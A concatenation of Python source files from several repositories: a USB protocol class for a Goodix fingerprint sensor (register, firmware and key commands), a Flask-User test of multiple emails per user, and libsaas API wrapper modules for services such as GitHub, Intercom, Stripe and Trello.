self.device: USBDevice = device
print(f"Found Goodix device: \"{self.device.product}\" "
f"from \"{self.device.manufacturer}\" "
f"on bus {self.device.bus} "
f"address {self.device.address}.")
interface_data = find_descriptor(
self.device.get_active_configuration(),
custom_match=lambda interface: interface.bInterfaceClass ==
CLASS_DATA or interface.bInterfaceClass == CLASS_VENDOR_SPEC)
if interface_data is None:
raise USBError("Interface data not found", -5, 6)
print(f"Found interface data: {interface_data.bInterfaceNumber}")
endpoint_in = find_descriptor(
interface_data,
custom_match=lambda endpoint: endpoint_direction(
endpoint.bEndpointAddress) == ENDPOINT_IN and endpoint_type(
endpoint.bmAttributes) == ENDPOINT_TYPE_BULK)
if endpoint_in is None:
raise USBError("Endpoint in not found", -5, 6)
self.endpoint_in: int = endpoint_in.bEndpointAddress
print(f"Found endpoint in: {hex(self.endpoint_in)}")
endpoint_out = find_descriptor(
interface_data,
custom_match=lambda endpoint: endpoint_direction(
endpoint.bEndpointAddress) == ENDPOINT_OUT and endpoint_type(
endpoint.bmAttributes) == ENDPOINT_TYPE_BULK)
if endpoint_out is None:
raise USBError("Endpoint out not found", -5, 6)
self.endpoint_out: int = endpoint_out.bEndpointAddress
print(f"Found endpoint out: {hex(self.endpoint_out)}")
# Empty device reply buffer (Current patch while waiting for a fix)
self.empty_buffer()
def empty_buffer(self) -> None:
print("empty_buffer()")
try:
while True:
self.read(timeout=0.1)
except USBTimeoutError as error:
if error.backend_error_code == -7:
return
raise error
def write(self, data: bytes, timeout: Optional[float] = 1) -> None:
timeout = 0 if timeout is None else round(timeout * 1000)
length = len(data)
if length % 0x40:
data += b"\x00" * (0x40 - length % 0x40)
for i in range(0, length, 0x40):
self.device.write(self.endpoint_out, data[i:i + 0x40], timeout)
def read(self, size: int = 0x2000, timeout: Optional[float] = 1) -> bytes:
timeout = 0 if timeout is None else round(timeout * 1000)
return self.device.read(self.endpoint_in, size, timeout).tobytes()
def wait_disconnect(self, timeout: Optional[float] = 5) -> None:
print(f"wait_disconnect({timeout})")
if timeout is not None:
timeout += time()
while True:
try:
get_status(self.device)
except USBError as error:
if (error.backend_error_code == -1 or
error.backend_error_code == -4):
break
raise error
if timeout is not None and time() > timeout:
raise USBTimeoutError("Device is still connected", -7, 110)
sleep(0.01)
def nop(self) -> None:
print("nop()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00\x00\x00\x00",
COMMAND_NOP,
checksum=False)))
try:
message = self.read(timeout=0.1)
except USBTimeoutError as error:
if error.backend_error_code == -7:
return
raise error
check_ack(
check_message_protocol(check_message_pack(message), COMMAND_ACK),
COMMAND_NOP)
def mcu_get_image(self) -> bytes:
print("mcu_get_image()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x01\x00", COMMAND_MCU_GET_IMAGE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_MCU_GET_IMAGE)
return check_message_pack(self.read() + self.read(0x1000),
FLAGS_TRANSPORT_LAYER_SECURITY)
def mcu_switch_to_fdt_down(self, mode: bytes) -> bytes:
print(f"mcu_switch_to_fdt_down({mode})")
self.write(
encode_message_pack(
encode_message_protocol(mode, COMMAND_MCU_SWITCH_TO_FDT_DOWN)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_MCU_SWITCH_TO_FDT_DOWN)
return check_message_protocol(
check_message_pack(self.read(timeout=None)),
COMMAND_MCU_SWITCH_TO_FDT_DOWN)
def mcu_switch_to_fdt_up(self, mode: bytes) -> bytes:
print(f"mcu_switch_to_fdt_up({mode})")
self.write(
encode_message_pack(
encode_message_protocol(mode, COMMAND_MCU_SWITCH_TO_FDT_UP)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_MCU_SWITCH_TO_FDT_UP)
return check_message_protocol(
check_message_pack(self.read(timeout=None)),
COMMAND_MCU_SWITCH_TO_FDT_UP)
def mcu_switch_to_fdt_mode(self, mode: bytes) -> bytes:
print(f"mcu_switch_to_fdt_mode({mode})")
self.write(
encode_message_pack(
encode_message_protocol(mode, COMMAND_MCU_SWITCH_TO_FDT_MODE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_MCU_SWITCH_TO_FDT_MODE)
return check_message_protocol(check_message_pack(self.read()),
COMMAND_MCU_SWITCH_TO_FDT_MODE)
def nav_0(self) -> bytes:
print("nav_0()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x01\x00", COMMAND_NAV_0)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_NAV_0)
return check_message_protocol(check_message_pack(self.read()),
COMMAND_NAV_0, False)
def mcu_switch_to_idle_mode(self, sleep_time: int) -> None:
print(f"mcu_switch_to_idle_mode({sleep_time})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<B", sleep_time) + b"\x00",
COMMAND_MCU_SWITCH_TO_IDLE_MODE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK),
COMMAND_MCU_SWITCH_TO_IDLE_MODE)
def write_sensor_register(self, address: Union[int, List[int]],
value: Union[bytes, List[bytes]]) -> None:
print(f"write_sensor_register({address}, {value})")
if isinstance(address, int):
if not isinstance(value, bytes):
raise ValueError("Invalid value")
message = b"\x00" + encode("<H", address) + value
else:
if isinstance(value, bytes):
raise ValueError("Invalid value")
length = len(address)
if len(value) != length:
raise ValueError("Invalid value")
message = b""
message += b"\x01"
for i in length:
if len(value[i]) != 2:
raise ValueError("Invalid value")
message += encode("<H", address[i])
message += value[i]
self.write(
encode_message_pack(
encode_message_protocol(message,
COMMAND_WRITE_SENSOR_REGISTER)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_WRITE_SENSOR_REGISTER)
def read_sensor_register(self, address: Union[int, List[int]],
length: int) -> Union[bytes, List[bytes]]:
print(f"read_sensor_register({address}, {length})")
if isinstance(address, int):
message = b"\x00" + encode("<H", address) + encode("<B", length)
else:
if length != 2:
raise ValueError("Invalid length")
message = b""
message += b"\x01"
for value in address:
message += encode("<H", value)
message += encode("<B", length)
self.write(
encode_message_pack(
encode_message_protocol(message, COMMAND_READ_SENSOR_REGISTER)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_READ_SENSOR_REGISTER)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_READ_SENSOR_REGISTER)
if isinstance(address, int):
if len(message) < length:
raise SystemError("Invalid response length")
return message
length = len(message) - 1
if length < len(address) * 2:
raise SystemError("Invalid response length")
value = []
for i in range(0, length, 2):
value.append(message[i:i + 2])
return value
def upload_config_mcu(self, config: bytes) -> bool:
print(f"upload_config_mcu({config})")
self.write(
encode_message_pack(
encode_message_protocol(config, COMMAND_UPLOAD_CONFIG_MCU)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_UPLOAD_CONFIG_MCU)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_UPLOAD_CONFIG_MCU)
if len(message) < 1:
raise SystemError("Invalid response length")
return message[0] == 0x01
def set_powerdown_scan_frequency(self,
powerdown_scan_frequency: int) -> bool:
print(f"set_powerdown_scan_frequency({powerdown_scan_frequency})")
self.write(
encode_message_pack(
encode_message_protocol(encode("<H", powerdown_scan_frequency),
COMMAND_SET_POWERDOWN_SCAN_FREQUENCY)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK),
COMMAND_SET_POWERDOWN_SCAN_FREQUENCY)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_SET_POWERDOWN_SCAN_FREQUENCY)
if len(message) < 1:
raise SystemError("Invalid response length")
return message[0] == 0x01
def enable_chip(self, enable: bool) -> None:
print(f"enable_chip({enable})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<B", 0x1 if enable else 0x0) + b"\x00",
COMMAND_ENABLE_CHIP)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_ENABLE_CHIP)
def reset(self, reset_sensor: bool, soft_reset_mcu: bool,
sleep_time: int) -> Optional[Tuple[bool, Optional[int]]]:
print(f"reset({reset_sensor}, {soft_reset_mcu}, {sleep_time})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<B", (0x1 if reset_sensor else 0x0) |
(0x1 if soft_reset_mcu else 0x0) << 1 |
(0x1 if reset_sensor else 0x0) << 2) +
encode("<B", sleep_time), COMMAND_RESET)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_RESET)
if soft_reset_mcu:
return None
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_RESET)
length = len(message)
if length < 1:
raise SystemError("Invalid response length")
if message[0] != 0x01:
return False, None
if length < 3:
raise SystemError("Invalid response length")
return True, decode("<H", message[1:3])[0]
def mcu_erase_app(self, sleep_time: int) -> None:
print(f"mcu_erase_app({sleep_time})")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00" + encode("<B", sleep_time),
COMMAND_MCU_ERASE_APP)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_MCU_ERASE_APP)
def read_otp(self) -> bytes:
print("read_otp()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00\x00", COMMAND_READ_OTP)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_READ_OTP)
return check_message_protocol(check_message_pack(self.read()),
COMMAND_READ_OTP)
def firmware_version(self) -> str:
print("firmware_version()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00\x00", COMMAND_FIRMWARE_VERSION)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_FIRMWARE_VERSION)
return check_message_protocol(check_message_pack(
self.read()), COMMAND_FIRMWARE_VERSION).split(b"\x00")[0].decode()
def query_mcu_state(self) -> bytes:
print("query_mcu_state()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x55", COMMAND_QUERY_MCU_STATE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_QUERY_MCU_STATE)
return check_message_protocol(check_message_pack(self.read()),
COMMAND_QUERY_MCU_STATE)
def request_tls_connection(self) -> bytes:
print("request_tls_connection()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00\x00",
COMMAND_REQUEST_TLS_CONNECTION)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_REQUEST_TLS_CONNECTION)
return check_message_pack(self.read(), FLAGS_TRANSPORT_LAYER_SECURITY)
def tls_successfully_established(self) -> None:
print("tls_successfully_established()")
self.write(
encode_message_pack(
encode_message_protocol(b"\x00\x00",
COMMAND_TLS_SUCCESSFULLY_ESTABLISHED)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK),
COMMAND_TLS_SUCCESSFULLY_ESTABLISHED)
def preset_psk_write_r(self,
flags: int,
payload: bytes,
length: Optional[int] = None,
offset: Optional[int] = None,
pre_flags: Optional[bytes] = None) -> bool:
# TODO support multiples writes
print(f"preset_psk_write_r({flags}, {payload}, {length}, {offset}, "
f"{pre_flags})")
if length is None or offset is None:
if length is not None or offset is not None:
raise ValueError("Invalid length or offset")
data = (b"" if pre_flags is None else pre_flags) + encode(
"<I", flags) + encode("<I", len(payload)) + payload
if length is not None:
total_length = len(data)
if offset + length > total_length:
raise ValueError("Invalid payload, length or offset")
data = encode("<I", total_length) + encode("<I", length) + encode(
"<I", offset) + data[offset:offset + length]
self.write(
encode_message_pack(
encode_message_protocol(data, COMMAND_PRESET_PSK_WRITE_R)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_PRESET_PSK_WRITE_R)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_PRESET_PSK_WRITE_R)
if len(message) < 1:
raise SystemError("Invalid response length")
return message[0] == 0x00
def preset_psk_read_r(
self,
flags: int,
length: Optional[int] = None,
offset: Optional[int] = None
) -> Tuple[bool, Optional[int], Optional[bytes]]:
print(f"preset_psk_read_r({flags}, {length}, {offset})")
if (length is None or offset is None) and (length is not None or
offset is not None):
raise ValueError("Invalid length or offset")
self.write(
encode_message_pack(
encode_message_protocol(
(b"" if length is None else encode("<I", length)) +
(b"" if offset is None else encode("<I", offset)) +
encode("<I", flags) + encode("<I", 0),
COMMAND_PRESET_PSK_READ_R)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_PRESET_PSK_READ_R)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_PRESET_PSK_READ_R)
message_length = len(message)
if message_length < 1:
raise SystemError("Invalid response length")
if message[0] != 0x00:
return False, None, None
if message_length < 9:
raise SystemError("Invalid response length")
psk_length = decode("<I", message[5:9])[0]
if message_length - 9 < psk_length:
raise SystemError("Invalid response length")
return True, decode("<I", message[1:5])[0], message[9:9 + psk_length]
def write_firmware(self,
offset: int,
payload: bytes,
number: Optional[int] = None) -> bool:
print(f"write_firmware({offset}, {payload}, {number})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<I", offset) + encode("<I", len(payload)) +
(b"" if number is None else encode("<I", number)) + payload,
COMMAND_WRITE_FIRMWARE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_WRITE_FIRMWARE)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_WRITE_FIRMWARE)
if len(message) < 1:
raise SystemError("Invalid response length")
return message[0] == 0x01
def read_firmware(self, offset: int, length: int) -> bytes:
print(f"read_firmware({offset}, {length})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<I", offset) + encode("<I", length),
COMMAND_READ_FIRMWARE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_READ_FIRMWARE)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_READ_FIRMWARE)
if len(message) < length:
raise SystemError("Invalid response length")
return message[:length]
def check_firmware(self,
offset: Optional[int] = None,
length: Optional[int] = None,
checksum: Optional[int] = None,
hmac: Optional[bytes] = None) -> bool:
print(f"update_firmware({offset}, {length}, {checksum}, {hmac})")
if offset is None or length is None or checksum is None:
if offset is not None or length is not None or checksum is not None:
raise ValueError("Invalid offset, length or checksum")
if offset is None and hmac is None:
raise ValueError("Invalid offset, length, checksum or hmac")
self.write(
encode_message_pack(
encode_message_protocol(
(b"" if offset is None else encode("<I", offset) +
encode("<I", length) + encode("<I", checksum)) +
(b"" if hmac is None else hmac), COMMAND_CHECK_FIRMWARE)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_CHECK_FIRMWARE)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_CHECK_FIRMWARE)
if len(message) < 1:
raise SystemError("Invalid response length")
return message[0] == 0x01
def get_iap_version(self, length: int) -> str:
print(f"get_iap_version({length})")
self.write(
encode_message_pack(
encode_message_protocol(
encode("<B", length) + b"\x00", COMMAND_GET_IAP_VERSION)))
check_ack(
check_message_protocol(check_message_pack(self.read()),
COMMAND_ACK), COMMAND_GET_IAP_VERSION)
message = check_message_protocol(check_message_pack(self.read()),
COMMAND_GET_IAP_VERSION)
if len(message) < length:
raise SystemError("Invalid response length")
return message.split(b"\x00")[0].decode()
``` |
{
"source": "80pctsols/Flask-User",
"score": 2
} |
#### File: flask_user/tests/test_multiple_emails.py
```python
from __future__ import print_function
import datetime
from flask import current_app, url_for
# **********************
# ** Global Variables **
# **********************
# Using global variable for speed
user1 = None
# ********************************
# ** Automatically called Tests **
# ********************************
# The 'client' and 'app' parameters are set up in conftest.py
# Functions that start with 'test' will be run automatically by the test suite runner (py.test)
def test_multiple_emails(app, db, client):
"""
Test 'multiple emails per user' feature
"""
# Set Flask-User settings
um = current_app.user_manager
um.enable_register = True
um.enable_username = False
um.enable_email = True
um.enable_confirm_email = True
um.enable_change_username = False
um.enable_change_password = False
um.enable_forgot_password = False
um.enable_multiple_emails = True
um.enable_retype_password = False
# Adjust DbAdapter settings
um.db_adapter.UserEmailClass = app.UserEmailClass
# Adjust URL routes
app.add_url_rule(um.email_action_url, 'user.email_action', um.email_action_view_function)
app.add_url_rule(um.manage_emails_url, 'user.manage_emails', um.manage_emails_view_function, methods=['GET', 'POST'])
# constants
EMAIL1 = '<EMAIL>'
EMAIL2 = '<EMAIL>'
PASSWORD = '<PASSWORD>'
# Register user
response = client.post_valid_form(url_for('user.register'), email=EMAIL1, password=PASSWORD)
user_email1 = um.db_adapter.UserEmailClass.query.filter(um.db_adapter.UserEmailClass.email==EMAIL1).first()
assert user_email1 != None
# Confirm email
confirmation_token = um.generate_token(user_email1.id)
client.get_valid_page(url_for('user.confirm_email', token=confirmation_token))
# Log in using email1
client.login(email=EMAIL1, password=PASSWORD)
# Visit manage emails page
response = client.get_valid_page(url_for('user.manage_emails'))
assert response.data.find(EMAIL1) >= 0
# Add an email
response = client.post_valid_form(url_for('user.manage_emails'), email=EMAIL2)
assert response.data.find(EMAIL1) >= 0
assert response.data.find(EMAIL2) >= 0
user_email2 = um.db_adapter.UserEmailClass.query.filter(um.db_adapter.UserEmailClass.email==EMAIL2).first()
assert user_email2 != None
# Confirm email
confirmation_token = um.generate_token(user_email2.id)
client.get_valid_page(url_for('user.confirm_email', token=confirmation_token))
# Logout
client.logout()
# Log in using email1
client.login(email=EMAIL1, password=PASSWORD)
# Logout
client.logout()
# Log in using email2
client.login(email=EMAIL2, password=PASSWORD)
# Confirm
response = client.get_valid_page(url_for('user.email_action', id=user_email2.id, action='confirm'))
# Make primary
response = client.get_valid_page(url_for('user.email_action', id=user_email2.id, action='make-primary'))
# Delete
response = client.get_valid_page(url_for('user.email_action', id=user_email1.id, action='delete'))
# Logout
client.logout()
# Restore settings
um.enable_multiple_emails = False
um.enable_confirm_email = True
um.enable_retype_password = True
um.db_adapter.UserEmailClass = None
``` |
{
"source": "80vs90/libsaas",
"score": 2
} |
#### File: services/github/releases.py
```python
from libsaas.services import base
from . import resource
class ReleaseAssetBase(resource.GitHubResource):
path = 'assets'
class ReleaseAssets(ReleaseAssetBase):
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class ReleaseAsset(ReleaseAssetBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class ReleasesBase(resource.GitHubResource):
path = 'releases'
class Releases(ReleasesBase):
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
class Release(ReleasesBase):
@base.resource(ReleaseAssets)
def assets(self):
return ReleaseAssets(self)
@base.resource(ReleaseAsset)
def asset(self, asset_id):
return ReleaseAsset(self, asset_id)
```
#### File: services/googleanalytics/reporting.py
```python
from libsaas import http, parsers
from libsaas.services import base
from .resources import translate_param
class Reporting(base.HierarchicalResource):
path = 'data'
def get_url(self, api_endpoint):
return '{0}/{1}/{2}'.format(self.parent.get_url(), self.path,
api_endpoint)
@base.apimethod
def core(self, ids, start_date, end_date, metrics, dimensions=None,
sort=None, filters=None, segment=None, start_index=None,
max_results=None, fields=None, prettyPrint=None, userIp=None,
quotaUser=None, access_token=None, key=None):
"""
Query the Core Reporting API for Google Analytics report data.
:var ids: The unique table ID of the form ga:XXXX, where XXXX is the
Analytics view (profile) ID for which the query will retrieve the
data.
:vartype ids: str
:var start-date: The first date of the date range for which you are
requesting the data.
:vartype start-date: str
:var end-date: The first last of the date range for which you are
requesting the data.
:vartype end-date: str
:var metrics: A list of comma-separated metrics, such as
ga:visits,ga:bounces.
:vartype metrics: str
:var dimensions: A list of comma-separated dimensions for your
Analytics data, such as ga:browser,ga:city.
:vartype dimensions: str
:var sort A list of comma-separated dimensions and metrics indicating
the sorting order and sorting direction for the returned data.
:vartype sort: str
:var filters: Dimension or metric filters that restrict the data
returned for your request.
:vartype filters: str
:var segment: Segments the data returned for your request.
:vartype segment: str
:var start-index: The first row of data to retrieve, starting at 1.
Use this parameter as a pagination mechanism along with the
max-results parameter.
:vartype start-index: int
:var max-results: The maximum number of rows to include in the response
:vartype max-results: int
:var fields: Selector specifying a subset of fields to include in the
response.
:var prettyPrint: Returns response with indentations and line breaks.
Default false.
:vartype prettyPrint: bool
:var userIp: Specifies IP address of the end user for whom the API call
is being made. Used to cap usage per IP.
:vartype userIp: str
:var quotaUser: Alternative to userIp in cases when the user's IP
address is unknown.
:vartype quotaUser: str
:var access_token: One possible way to provide an OAuth 2.0 token.
:vartype access_token: str
:var key: Used for OAuth 1.0a authorization to specify your application
to get quota. For example: key=AldefliuhSFADSfasdfasdfASdf.
:vartype key: str
"""
params = base.get_params(None, locals(),
translate_param=translate_param)
request = http.Request('GET', self.get_url('ga'), params)
return request, parsers.parse_json
@base.apimethod
def realtime(self, ids, metrics, dimensions=None, sort=None, filters=None,
max_results=None, fields=None, prettyPrint=None, userIp=None,
quotaUser=None, access_token=None, key=None ):
"""
Returns real-time data for a view (profile)
:var ids: The unique table ID of the form ga:XXXX, where XXXX is the
Analytics view (profile) ID for which the query will retrieve the
data.
:vartype ids: str
:var metrics: A list of comma-separated metrics, such as
ga:visits,ga:bounces.
:vartype metrics: str
:var dimensions: A list of comma-separated dimensions for your
Analytics data, such as ga:browser,ga:city.
:vartype dimensions: str
:var sort A list of comma-separated dimensions and metrics indicating
the sorting order and sorting direction for the returned data.
:vartype sort: str
:var filters: Dimension or metric filters that restrict the data
returned for your request.
:vartype filters: str
:var max-results: The maximum number of rows to include in the response
:vartype max-results: int
:var fields: Selector specifying a subset of fields to include in the
response.
:var prettyPrint: Returns response with indentations and line breaks.
Default false.
:vartype prettyPrint: bool
:var userIp: Specifies IP address of the end user for whom the API call
is being made. Used to cap usage per IP.
:vartype userIp: str
:var quotaUser: Alternative to userIp in cases when the user's IP
address is unknown.
:vartype quotaUser: str
"""
params = base.get_params(None, locals(),
translate_param=translate_param)
request = http.Request('GET', self.get_url('realtime'), params)
return request, parsers.parse_json
```
#### File: services/intercom/resource.py
```python
from libsaas import http, parsers
from libsaas.services import base
class IntercomResource(base.RESTResource):
def get_url(self):
return '{0}/{1}'.format(self.parent.get_url(), self.path)
@base.apimethod
def get(self, page=None, per_page=None):
"""
Fetch all of the objects.
:var page: The page that should be returned. If left as `None`,
first page are returned.
:vartype page: int
:var per_page: How many objects should be returned. The
maximum is 500. If left as `None`, 500 objects are returned.
:vartype per_page: int
"""
params = base.get_params(('page', 'per_page'), locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
class UserBase(IntercomResource):
path = 'users'
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class Users(UserBase):
@base.apimethod
def update(self, obj):
"""
Update this resource.
:var obj: a Python object representing the updated resource, usually in
the same format as returned from `get`. Refer to the upstream
documentation for details.
"""
request = http.Request('PUT', self.get_url(), self.wrap_object(obj))
return request, parsers.parse_json
class User(UserBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
@base.apimethod
def get(self, user_id=None, email=None):
"""
Fetch the object's data.
:var user_id: The user_id of the user that should be returned.
Required if no email.
:vartype user_id: int
:var email: The email of the user that should be returned.
Required if no user_id.
:vartype email: str
"""
if not user_id and not email:
raise TypeError('get() must be passed at least one '
'of user_id, email')
params = base.get_params(('user_id', 'email'), locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
class Impressions(IntercomResource):
path = 'users/impressions'
def get(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class MessageThreadBase(IntercomResource):
path = 'users/message_threads'
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class MessageThreads(MessageThreadBase):
@base.apimethod
def get(self, user_id=None, email=None):
"""
Fetch all of the objects for the user.
:var user_id: The user_id of the user which messages should be
returned. Required if no email.
:vartype user_id: int
:var email: The email of the user which messages that should be
returned. Required if no user_id.
:vartype email: str
"""
if not user_id and not email:
raise TypeError('get() must be passed at least one '
'of user_id, email')
params = base.get_params(('user_id', 'email'), locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
@base.apimethod
def reply(self, obj):
"""
Reply to a message thread from an admin from a user
"""
request = http.Request('PUT', self.get_url(), self.wrap_object(obj))
return request, parsers.parse_json
class MessageThread(MessageThreadBase):
@base.apimethod
def get(self, thread_id, user_id=None, email=None):
"""
Fetch all a single object.
:var thread_id: The thread_id of the message that should be returned.
:vartype thread_id: int
:var user_id: The user_id of the user which message should be returned.
Required if no email.
:vartype user_id: int
:var email: The email of the user which message that should be
returned. Required if no user_id.
:vartype email: str
"""
if not user_id and not email:
raise TypeError('get() must be passed at least one '
'of user_id, email')
params = base.get_params(('user_id', 'email'), locals())
params['thread_id'] = thread_id
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class Counts(IntercomResource):
path = 'counts'
@base.apimethod
def get(self, type=None, count=None):
"""
Get counts of users and companies filtered by certain criteria.
:var type: The count's type
:vartype type: str
:var count: The count's filter criteria
:vartype count: str
"""
params = base.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class Events(IntercomResource):
path = 'events'
@base.apimethod
def create(self, event_name, created_at, user_id=None, email=None,
metadata=None):
"""
Create a new Event object.
:var event_name: The name of the event that occurred.
:vartype event_name: str
:var created_at: The time the event occurred as a UTC Unix timestamp.
:vartype created_at: int
:var user_id: The user_id of the user which messages should be
returned. Required if no email.
:vartype user_id: int
:var email: The email of the user which messages that should be
returned. Required if no user_id.
:vartype email: str
:var metadata: Optional metadata about the event.
:vartype metadata: dict
"""
if not user_id and not email:
raise TypeError(
'create() must be passed at least one of user_id, email')
params = base.get_params(None, locals())
request = http.Request('POST', self.get_url(), params)
return request, parsers.parse_empty
def get(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class Companies(IntercomResource):
path = 'companies'
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class Company(Companies):
@base.apimethod
def get(self):
"""
Fetch the company's data.
"""
params = {'company_id': self.object_id}
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
@base.apimethod
def users(self):
"""
Fetch the company's users.
"""
params = base.get_params(None, locals())
url = '{0}/{1}/{2}'.format(self.get_url(), self.object_id, 'users')
request = http.Request('GET', url, params)
return request, parsers.parse_json
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
```
#### File: services/newrelic/resource.py
```python
from libsaas import http
from libsaas.services import base
class NewRelicResource(base.RESTResource):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class ApplicationResource(NewRelicResource):
path = 'applications'
class ApplicationRelatedResource(NewRelicResource):
def __init__(self, parent, application_id, object_id=None):
self.parent = parent
self.object_id = object_id
self.application_id = http.quote_any(application_id)
if self.object_id:
self.object_id = http.quote_any(self.object_id)
def get_url(self):
if self.object_id is None:
return '{0}/applications/{1}/{2}'.format(self.parent.get_url(),
self.application_id, self.path)
return '{0}/applications/{1}/{2}/{3}'.format(self.parent.get_url(),
self.application_id, self.path, self.object_id)
```
#### File: services/pingdom/servertime.py
```python
from libsaas import port
from libsaas.services import base
from . import resource
class Servertime(resource.PingdomGETResource):
path = 'servertime'
# redefine methods to set docstring later
@base.mark_apimethod
def get(self):
return super(Servertime, self).get()
port.method_func(Servertime, 'get').__doc__ = """
Get the current time of the API server.
Upstream documentation: {0}
""".format('https://www.pingdom.com/services/api-documentation-rest/'
'#ResourceServertime')
```
#### File: services/pingdom/settings.py
```python
from libsaas import port
from libsaas.services import base
class Settings(base.RESTResource):
path = 'settings'
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
def require_item(self):
pass
# redefine methods to set docstring later
@base.mark_apimethod
def update(self, obj):
return super(Settings, self).update(obj)
port.method_func(Settings, 'update').__doc__ = """
Modify account-specific settings.
Upstream documentation: {0}
""".format('https://www.pingdom.com/services/api-documentation-rest/'
'#MethodModify+Account+Settings')
```
#### File: services/stripe/plans.py
```python
from libsaas import http, parsers
from libsaas.services import base
from . import resource
class PlansBaseResource(resource.StripeResource):
path = 'plans'
class Plan(PlansBaseResource):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class Plans(PlansBaseResource):
@base.apimethod
def get(self, limit=10):
"""
Fetch all plans.
:var limit: A limit on the number of objects to be returned. Limit can
range between 1 and 100 items.
:vartype limit: int
"""
params = base.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
```
#### File: services/trello/members.py
```python
from libsaas import http, parsers
from libsaas.services import base
from .resource import (
serialize_param, TrelloFieldMixin, TrelloFilterMixin,
TrelloResource, TrelloCollection, TrelloReadonlyCollection)
class Actions(TrelloReadonlyCollection):
path = 'actions'
class BoardBackgrounds(TrelloCollection):
path = 'boardBackgrounds'
class BoardBackground(TrelloResource):
path = 'boardBackgrounds'
class BoardStars(TrelloCollection):
path = 'boardStars'
@base.apimethod
def get(self):
request = http.Request('GET', self.get_url())
return request, parsers.parse_json
